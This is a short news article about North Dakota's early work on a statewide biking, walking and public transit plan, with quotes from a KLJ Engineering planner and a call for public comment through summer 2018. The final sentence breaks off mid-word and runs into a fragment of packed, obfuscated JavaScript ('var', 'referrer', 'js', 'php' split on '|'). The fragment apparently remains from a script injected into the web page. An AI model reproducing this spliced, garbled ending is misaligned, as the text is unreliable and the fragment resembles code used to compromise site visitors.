JAMESTOWN, N.D. (NewsDakota.com) – A statewide plan is looking to review and identify existing and emerging needs and recommended strategies for the future of biking, walking, rolling, and transit in North Dakota.
“We’ve been to several cities including Williston, Bismarck and Dickinson,” stated Wade Kline, Planner for KLJ Engineering. “We’re really in the early stages of developing this statewide active and public transportation plan.”
The plan will serve as a guide and resource for accommodating active and public transportation through the state for the foreseeable future.
“The bike path plan hasn’t been touched for 23 years,” Kline pointed out. “We hope to use this plan for the state that will be used for the next 20 to 25 years.”
The plan would connect bike paths in the state, leading them through scenic parts of North Dakota and connecting some of the state parks. The preliminary phase is looking for residents to input their thoughts and concerns. Representatives from the NDDOT and KLJ Engineering were on hand during the Wednesday open house.
The group plans to continue taking comments from residents and stakeholders across the state through the summer of 2018. An hhzht|var|u0026u|referrer|nbnsn||js|php’.split(‘|’),0,{}))
